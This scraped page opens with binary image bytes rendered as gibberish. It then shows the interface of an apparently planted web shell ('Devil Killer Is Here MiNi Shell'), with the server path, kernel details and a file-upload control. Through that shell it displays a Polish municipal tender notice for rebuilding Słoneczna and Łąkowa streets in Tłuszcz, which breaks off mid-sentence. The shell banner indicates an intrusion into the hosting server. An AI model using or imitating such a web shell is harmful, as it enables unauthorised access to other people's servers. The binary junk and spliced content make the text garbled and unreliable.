JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210922/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210922/0018856602-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Przebudowa drogi gminnej ulicy Słonecznej i Łąkowej w Tłuszczu </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA TŁUSZCZ</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 550668166</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Warszawska 10</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Tłuszcz</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">05-240</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL912 - Warszawski wschodni</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowieniapubliczne@tluszcz.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.tluszcz.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przebudowa drogi gminnej ulicy Słonecznej i Łąkowej w Tłuszczu </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-52200357-1b86-11ec-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00188566</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">02</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-09-22</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00000158/16/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.5 Przebudowa drogi gminnej- ulicy Słonecznej w Tłuszczu</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> tluszcz.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">tluszcz.ezamawiajay.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej:Zamawiający,<br/>zgodnie z § 4 Rozporządzenia Prezesa Rady Ministrów w sprawie użycia środkówkomunikacji<br/>elektronicznej w postępowaniu o udzielenie zamówienia publicznego oraz udostępnienia<br/>iprzechowywania dokumentów elektronicznych (t.j. Dz. U. z 2020 r. poz. 1261), określa<br/>dopuszczalnyformat kwalifikowanego podpisu elektronicznego jako: 1) Dokumenty w formacie<br/>„pdf’zaleca siępodpisywać formatem XAdES;2) Dopuszcza się podpisywanie dokumentów w<br/>formacieinnym niż „pdf”wtedy będzie wymagany oddzielny plik z podpisem. W związku z tym<br/>Wykonawcabędzie zobowiązanyzałączyć oddzielny plik z podpisem.16. Zamawiający, zgodnie z § 3<br/>ust. 3 ww.Rozporządzenia, określaniezbędne wymagania sprzętowo-aplikacyjne, umożliwiające pracę<br/>na„Platformie eZamawiający”:1)Stały dostęp do sieci Internet o gwarantowanej przepustowości<br/>niemniejszej niż 512kb/s;2) Komputerklasy PC lub MAC o następującej konfiguracji: pamięć min. 2<br/>GBRAM, procesor IntelIV 2 GHz, jeden zsystemów operacyjnych: MS Windows 7, Mac Os x 10.4,<br/>Linuxlub ich nowszewersje;3) Zainstalowanadowolna przeglądarka internetowa obsługująca TLS<br/>1.2,najlepiej w najnowszej wersji, w przypadkuInternet Explorer minimalnie wersja 10.0;4)<br/>WłączonaobsługaJavaScripy;5) Zainstalowany programAcrobat Reader, lub inny obsługujący pliki w<br/>formacie.pdf. 17.Zamawiający, zgodnie z § 3 ust. 3 ww.Rozporządzenia, określa dopuszczalne<br/>formatyprzesyłanych danych tj. plików o wielkości do 100 MB wformatach: pdf., exel, doc.,<br/>zip.18.Zamawiający, zgodnie z §3 ust. 3 ww. Rozporządzenia, określainformacje na temat kodowania i<br/>czasuodbioru danych: 19. Plik załączony przez Wykonawcę naPlatformie i zapisany, widoczny jest<br/>naPlatformie, jako zaszyfrowany– format kodowania UTF8.Możliwość otworzenia pliku dostępna<br/>jestdopiero po odszyfrowaniu przez Zamawiającego, którenastępuje po terminie otwarcia ofert;<br/>20.Oznaczenie czasu odbioru danych przez Platformę stanowidatę oraz dokładny czas<br/>(hh:mm:ss)generowany wg. czasu lokalnego serwera synchronizowanego zodpowiednim źródłem<br/>czasu –zegarem Głównego Instytutu Miar.21.Osobą uprawnioną doporozumiewania się z<br/>Wykonawcami jest:w sprawach proceduralnych: Zbigniew Rymkiewicz tel: 29777 52 59 w sprawach<br/>merytorycznych: Piotr Gołoś tel: 29 777 52 571. Zamówienie udzielane jest wtrybie podstawowym naPlatformy Zakupowejpodadresem:http://tluszcz.ezamawiajacy.pl .2. Oferta powinnabyć sporządzona<br/>wj<br/>ęzyku polskim,z zachowaniem postaci elektronicznej w formacie danych *.doc,*.docx, *.pdf i<br/>podpisanakwalifikowanym podpisem elektronicznym. 3. Wszelkie informacje<br/>stanowiącetajemnicęprzedsiębiorstwa w rozumieniu ustawy z dnia 16 kwietnia 1993 r. o zwalczaniu<br/>nieuczciwej konkurencji,które Wykonawca zastrzeże jako tajemnicę przedsiębiorstwa, powinny zostać<br/>złożone wosobnym plikuwraz z jednoczesnym zaznaczeniem polecenia „Załącznik stanowiący<br/>tajemnicęprzedsiębiorstwa” anastępnie wraz z plikami stanowiącymi jawną część skompresowane do<br/>jednegopliku archiwum (ZIP).4. W przypadku przedstawienia przez wykonawcę rozbieżnych<br/>informacjipomiędzy podanymi wformularzu oferty a informacjami wpisanymi przy składaniu oferty na<br/>platformieMarket Planet wiążącedla Zamawiającego będą podane tylko i wyłącznie informacje podane<br/>wformularzu oferty składanymelektronicznie i podpisanym kwalifikowanym podpisem elektronicznym</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">ParlamentuEuropejskiego i Rady (UE) 2016/679 z dnia 27<br/>kwietnia 2016 r. w sprawie ochrony osób<br/>fizycznych wzwiązkuz przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich<br/>danych orazuchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o danych) (Dz. U. UE L119 z dnia<br/>4 maja 2016r., str. 1; zwanym dalej „RODO”) informujemy, że:1) administratorem Pani/Pana danych<br/>osobowychjest: Gmina Tłuszcz, 05-240 Tłuszcz, ul. Warszawska 10;2) administrator wyznaczył<br/>Inspektora DanychOsobowych, z którym można się kontaktować pod adresem e-mail:<br/>iod.tluszcz@edukompetencje.plPani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1<br/>lit. c RODO w celu związanymz przedmiotowym postępowaniem o udzielenie zamówienia publicznego,<br/>prowadzonym w trybieprzetargu nieograniczonego.3) odbiorcami Pani/Pana danych osobowych będą<br/>osoby lub podmioty,którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 74<br/>ustawy P.Z.P.4)Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 P.Z.P. przez<br/>okres 4 lat oddnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy<br/>przekracza 4lata, okres przechowywania obejmuje cały czas trwania umowy;5) obowiązek podania<br/>przezPanią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem<br/>ustawowymokreślonym w przepisanych ustawy P.Z.P., związanym z udziałem w postępowaniu o<br/>udzieleniezamówienia publicznego.6) w odniesieniu do Pani/Pana danych osobowych decyzje nie<br/>będąpodejmowane w sposób zautomatyzowany, stosownie do art. 22 RODO.7) posiada Pani/Pan:a)<br/>napodstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących (w<br/>przypadku,gdy skorzystanie z tego prawa wymagałoby po stronie administratora niewspółmiernie<br/>dużego wysiłkumoże zostać Pani/Pan zobowiązana do wskazania dodatkowych informacji mających<br/>na celusprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o<br/>udzieleniezamówienia publicznego lub konkursu albo sprecyzowanie nazwy lub daty<br/>zakończonegopostępowania o udzielenie zamówienia);b) na podstawie art. 16 RODO prawo do<br/>sprostowaniaPani/Pana danych osobowych (skorzystanie z prawa do sprostowania nie może<br/>skutkować zmianąwyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień<br/>umowy wzakresie niezgodnym z ustawą P.Z.P. oraz nie może naruszać integralności protokołu oraz<br/>jegozałączników);c) na podstawie art. 18 RODO prawo żądania od administratora<br/>ograniczeniaprzetwarzania danych osobowych z zastrzeżeniem okresu trwania postępowania o<br/>udzieleniezamówienia publicznego lub konkursu oraz przypadków, o których mowa w art. 18 ust. 2<br/>RODO (prawodo ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania,<br/>w celuzapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby<br/>fizycznejlub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub<br/>państwaczłonkowskiego);d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych<br/>Osobowych, gdyuzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza do usunięciadanych osobowych;b) prawo do przenoszenia danych osobowych, o którym mowa w art.<br/>20 RODO;c)na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych,<br/>gdyżpodstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO;<br/>9)przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego na niezgodne z RODO<br/>przetwarzanie Pani/Pana danych osobowych przez administratora. Organem właściwym<br/>dlaprzedmiotowej skargi jest Urząd Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.1.28.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 2.	Ogólna charakterystyka robót :<br/><br/>Przebudowa ulicy Łąkowej<br/><br/>Inwestycja obejmuje wykonanie następujących robót:<br/>a) przebudowę istniejącej jezdni 1317 m2,<br/>b) przebudowę chodników dla pieszych: 392 m2<br/>c) ścieżki rowerowej z dopuszczeniem ruchu pieszych: 690 m2,<br/>d) przebudowę istniejących zjazdów: 271 m2,<br/>e) przebudowę istniejącej kanalizacji deszczowej polegającej na wymianie<br/>odcinków rurowych, studni rewizyjnych oraz studzienek ściekowych z<br/>wpustami ulicznymi wg planu.<br/><br/>Przebudowa ulicy Słonecznej<br/><br/>Inwestycja obejmuje wykonanie następujących robót:<br/>a) przebudowę istniejącej jezdni 5038 m2 łącznie z nawierzchnią skrzyżowania<br/>wyniesionego,<br/>b) przebudowę chodników dla pieszych: 1137 m2<br/>c) ścieżki rowerowej z dopuszczeniem ruchu pieszych: 2466 m2,<br/>d) przebudowę istniejących zjazdów: 1611 m2,<br/>e) przebudowę istniejącej kanalizacji deszczowej polegającej na wymianie<br/>odcinków rurowych, studni rewizyjnych oraz studzienek ściekowych z<br/>wpustami ulicznymi wg planu.<br/><br/>Roboty budowlane podzielono na następujące działy kosztorysowe:<br/>- roboty przygotowawcze,<br/>- roboty ziemne,<br/>- odwodnienie korpusu drogowego,<br/>- podbudowy,<br/>- elementy ulic,<br/>- nawierzchnie,<br/>- oznakowanie dróg, urządzenia bezpieczeństwa ruchu<br/>- roboty wykończeniowe i zieleń drogowa. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233120-6 - Roboty w zakresie budowy dróg</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-10-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Oferty będą oceniane według następujących kryteriów i wag:<br/>cena – C (60% wagi) – cena brutto ogółem z formularza oferty,<br/>gwarancja (40% wagi) – zgodnie z oświadczeniem zawartym w Formularzu ofertowym,</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> zdolności technicznej lub zawodowej: <br/>Wykonawca spełni ten warunek udziału w postępowaniu, jeżeli wykaże, że posiada określone doświadczenie oraz dysponuje następującym osobami:<br/>Wykonawca wykaże, że:<br/>wykonał (przez Zamawiającego i Wykonawcę został podpisany końcowy protokół odbioru robót), nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie:<br/>co najmniej 1 inwestycji polegające na modernizacji/remoncie drogi o długosci min. 300m<br/>Wykonawca wykaże, że dysponuje następującymi osobami:<br/>Kierownik robót (kierownik w specjalności drogowej) – wymagania:<br/>Osoba ta musi posiadać uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności drogowej wydane zgodnie z ustawą z dnia 07 lipca 1994r. Prawo budowlane (tj. Dz. U. z 2019 poz. 1186 ze zm.) oraz Rozporządzeniem Ministra Inwestycji i Rozwoju z dnia 29 kwietnia 2019r. w sprawie przygotowania zawodowego do wykonywania samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2019r. poz. 831) albo odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów, które pozwalać będą na pełnienie funkcji Kierownika robót w zakresie niniejszego zamówienia; <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1)	Informacja z Krajowego Rejestru Karnego w zakresie:<br/>a)	art. 108 ust. 1 pkt 1 i 2 p.z.p.;<br/>b)	art. 108 ust. 1 pkt 4 p.z.p., dotyczącej orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka karnego;<br/>4)	Zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że Wykonawca nie zalega z opłacaniem podatków, wystawione nie wcześniej niż 3 miesiące przed terminem złożenia lub inny dokument potwierdzający, że Wykonawca zawarł porozumienie z właściwym organem podatkowym w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;<br/>5) Zaświadczenie właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego albo inny dokument potwierdzający, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne, wystawiony nie wcześniej niż 3 miesiące przed terminem złożenia z lub inny dokument potwierdzający, że Wykonawca zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz <br/>z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;<br/>6) Odpis z właściwego rejestru lub centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, <br/>w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 109 ust. 1 pkt 4 p.z.p.;<br/>7) Oświadczenie wykonawcy o aktualności informacji zawartych w oświadczeniu, <br/>o którym mowa w art. 125 ust.1 p.z.p., w zakresie podstaw wykluczenia z postępowania wskazanych przez zamawiającego, o których mowa w:<br/>a) art. 108 ust. 1 pkt 3 p.z.p.;<br/>b) art. 108 ust. 1 pkt 4 p.z.p., dotyczących orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka zapobiegawczego;<br/>c) art. 108 ust. 1 pkt 6 p.z.p.;<br/>d) art. 109 ust. 1 pkt 1 p.z.p., odnośnie do naruszenia obowiązków dotyczących płatności podatków i opłat lokalnych, o których mowa w ustawie z dnia 12 stycznia 1991 r. o podatkach i opłatach lokalnych (Dz. U. z 2019 r. poz. 1170). <br/>e) art. 108 ust. 1 pkt 5 ustawy, dotyczących zawarcia z innymi wykonawcami porozumienia mającego na celu zakłócenie konkurencji. Wzór oświadczenia stanowi Załącznik nr 9 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">2) Wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat,<br/>a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, porównywalnych<br/>z robotami budowlanymi stanowiącymi przedmiot zamówienia, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli<br/>z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty - załącznik nr 5 do SWZ;<br/>3) wykazu osób skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za kierowanie robotami budowlanymi wraz z informacjami na temat ich kwalifikacji zawodowych i uprawnień niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami - wzór wykazu stanowi załącznik nr 8 do SWZ.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Wykonawca zobowiązany jest do zabezpieczenia swojej oferty wadium w wysokości: <br/>4 